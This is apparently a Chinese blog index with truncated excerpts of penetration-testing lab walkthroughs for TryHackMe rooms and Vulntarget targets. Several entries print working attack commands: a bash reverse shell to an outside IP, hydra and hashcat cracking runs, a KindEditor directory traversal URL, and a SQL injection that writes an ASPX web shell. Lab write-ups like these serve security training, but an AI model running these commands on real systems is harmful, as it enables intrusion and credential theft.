TryHackMe-RootMe
TryHackMe-RootMeTask1
Task2目录扫描
进入/panel发现了可以进行文件上传
尝试上传phpinfo
发现这里有限制
尝试进行 绕过
成功上传
然后进行反弹shell
12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879808182838485868788899091929394959697989910010110210310410510610710810911011111211311411511611711811912012112212312412512612712812913013113213313413513613713813914014114214314414514614714814915015115215315415515615715815916016116216316416516 ...
TryHackMe-Pickle-Rick
TryHackMe-Pickle RickTask1nmap首先探测
访问80,查看源码发现了用户名:R1ckRul3s
没什么发现,就进行目录扫描
在robots.txt中发现了一串
然后在login.php中输入这对密码,进入后台
尝试反弹shell
1bash -c "bash -i >& /dev/tcp/10.8.80.226/7777 0>&1"
成功回弹
1sudo -l
发现配置不当,不需要密码即可
TryHackMe-Cyborg
TryHackMe-CyborgTask1Task2nmap扫描探测
目录扫描
在/etc中发现了两个文件
分别是
1music_archive:$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.
1234567auth_param basic program /usr/lib64/squid/basic_ncsa_auth /etc/squid/passwdauth_param basic children 5auth_param basic realm Squid Basic Authenticationauth_param basic credentialsttl 2 hoursacl auth_users proxy_auth REQUIREDhttp_access allow auth_users
通过hash-identifier发现了是md5(ARP)
1hashcat -m 1600 -a 0 hash /usr/share/wordlists/rockyou.txt
解出了密码
探测/admin ...
TryHackMe-Agent-Sudo
TryHackMe-Agent SudoTask1
Task2首先nmap进行探测
1nmap ip -A
开了三个端口
探测80
这里说需要我们进行修改UA,于是进行fuzz
发现了R和C存在不同的响应
并且C存在302的跳转尝试读取
1curl -A "C" -L ip
发现用户chris
Task3并且了解了该用户的密码是弱密码
尝试爆破ftp和ssh对该用户
1hydra -l chris -P /usr/share/wordlists/rockyou.txt 10.10.198.171 ftp
跑出了ftp的密码尝试登录上去搜集
通过get命令下载这三个文件到本地
查看txt
1234567Dear agent J,All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. I ...
TryHackMe-Mr.Robot
TryHackMe-Mr Robot环境配置启动靶机
连上vpn
下载到kali进行连接
1openvpn xx.vpn
flag1namp 探测端口
访问80 页面很炫酷
然后进行常规的dir扫描
主要扫出了
123robots.txtwordpressphpmyadmin
得到第一个flag
以及一个字典
flag2用得到的字典去跑wp的login
尝试了admin,发现没有这个账户
因此用自己分别跑name和pass
最后跑出来#男主的名字 哈哈
12name:Elliotpass:ER28-0652
然后就是wp的后台进行editor目录getshell
12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879808182838485868788899091929394959697989910010110210 ...
Vulntarget-m
vulntarget-m环境搭建下载链接:
1链接: https://pan.baidu.com/s/1sv9qdioNF4PTUliix5HEfg 提取码: 2dwq
该靶机必须内网所有ip一致,不然在第一层可能访问不了80端口报错502
外网使用桥接或者nat
在02和03的机器上输入
12sudo netplan apply #应用配置好的静态ipvulntarget #密码
然后再ifconfig查看是否为每台机器所对应的内网ip即可
打靶过程flag1fscan一把嗦
既然有nacos的poc那就直接打
https://cloud.tencent.com/developer/article/1784279
成功创建test用户进入后台
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687 ...
Vulntarget-k
Vulntarget-k环境搭建12https://pan.baidu.com/s/1sv9qdioNF4PTUliix5HEfg提取码: 2dwq
配置ip
只用修改xxl-job中ip1为攻击机同一网段下即可
1vim /etc/netplan/00-installer-config.yaml #修改静态的ip即可
打靶记录flag1首先上场的是fscan老大哥,但是扫描无果
然后去尝试挨个访问端口,看看有什么收获没
在9999端口发现了
通过google发现了xxl-job的api的未授权
然后在github上下载了相关的工具进行直接反弹shell
https://github.com/charonlight/xxl-jobExploitGUI/releases/tag/v1.0
flag2构建frp代理,在内网进行fscan扫描
123456[+] http://192.168.100.50:8848 poc-yaml-alibaba-nacos [*] WebTitle: http://192.168.100.50:8800 code:503 ...
Vulntarget-j
Vulntarget-j进行fscan大保健一下
存在80和7001进行web探测
在80中进行相关的报错,探测出服务器上的绝对路径
这里看到了fastadmin的cms
于是去复现了最新的前台getshell,
https://cloud.tencent.com/developer/article/2204408
失败了
因为admin的登录页面是特定的所以暂时放弃了
然后转到7001 weblogic
进行了相关工具的探测也没有存在的相关漏洞
然后进行目录爆破,发现了example目录
发现不能进行kindEditor的文件上传漏洞
于是通过读取
1http://10.0.2.5:7001/kindeditor.js
发现是3.5.5版本,搜索存在目录遍历
于是遍历出fastadmin的admin登录页面
通过.././绕过../的限制
1http://10.0.2.5:7001/php/file_manager_json.php?path=.././.././fastadmin/public/
1http:/ ...
Vulntarget-i
Vulntarget-I
探测80端口是iis的默认页面
然后转到8000端口
进行了目录扫描发现了adminer
然后根据网上的adminer漏洞有一个任意文件读取
也没复现出来,然后看的wp跟着成功了
首先现在本地的mysql开启外连
1GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'root' WITH GRANT OPTION;
然后创建一个database和一张表来收集数据
1create database adminer; create table test(text text(4096));
然后就在该adminer页面上登录自己的mysql
如果想读配置文件的话需要相关的绝对路径
所以根据该系统是phpstudy搭建的,而且根据下面的插件的提示apache版本为2.4.39
在根据本地自己的phpstudy的文件位置
就可以根据相对路径读取该0localhost_8000.conf
1load data local in ...
Vulntarget-h
Vulntarget-hwin2008
去探测一下80服务
上传一句话木马
1234/index.aspx?user_id=1;declare @f int,@g int;exec sp_oacreate 'Scripting.FileSystemObject',@f output;EXEC SP_OAMETHOD @f,'CreateTextFile',@f OUTPUT,'C:\inetpub\edrfgyhujikopl\tx.aspx',1;EXEC sp_oamethod @f,'WriteLine',null,'<%@ Page Language="Jscript"%><%var a = "un";var b = "safe";Response.Write(eval(Request.Item["z"],a%abb));%>';
发现是个低权限的iis,并且 ...